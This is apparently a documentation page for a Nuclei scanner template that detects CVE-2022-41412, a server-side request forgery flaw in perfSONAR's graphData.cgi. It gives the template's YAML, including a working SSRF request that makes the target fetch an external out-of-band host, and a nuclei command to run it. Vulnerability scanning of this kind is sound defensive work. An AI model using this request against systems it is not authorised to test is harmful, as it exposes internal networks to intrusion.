Skip to content
Nuclei Templates

perfSONAR 4.x <= 4.4.4 - Server-Side Request Forgery

ID: CVE-2022-41412

Severity: high

Author: null_hypothesis

Tags: cve,cve2022,ssrf,hackerone,packetstorm,perfsonar

Description

Section titled “Description”

An issue in the graphData.cgi component of perfSONAR v4.4.5 and prior allows attackers to access sensitive data and execute Server-Side Request Forgery (SSRF) attacks.

YAML Source

Section titled “YAML Source”
id: CVE-2022-41412


info:
  name: perfSONAR 4.x <= 4.4.4 - Server-Side Request Forgery
  author: null_hypothesis
  severity: high
  description: |
    An issue in the graphData.cgi component of perfSONAR v4.4.5 and prior allows attackers to access sensitive data and execute Server-Side Request Forgery (SSRF) attacks.
  reference:
    - https://github.com/renmizo/CVE-2022-41412
    - https://hackerone.com/reports/2445802
    - https://github.com/perfsonar/graphs/commit/463e1d9dc30782d9b1c002143551ec78b74e03bb
    - https://www.perfsonar.net/releasenotes-2022-09-20-4-4-5.html
    - http://packetstormsecurity.com/files/170069/perfSONAR-4.4.4-Open-Proxy-Relay.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2022-41412
    cwe-id: CWE-918
    epss-score: 0.0224
    epss-percentile: 0.89541
    cpe: cpe:2.3:a:perfsonar:perfsonar:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: perfsonar
    product: perfsonar
    fofa-query:
      - title="perfSONAR Toolkit"
      - title="perfsonar toolkit"
  tags: cve,cve2022,ssrf,hackerone,packetstorm,perfsonar


http:
  - method: GET
    path:
      - "{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - <h1> Interactsh Server </h1>


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f391dc82e05ba05e316b92bbc641eaada7f10fe84f8a6fa820d5f66b10980792022100f91d097002b841895d85e959892beaa07e1e8aacd780311a144808287f7256d3:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-41412.yaml"

View on Github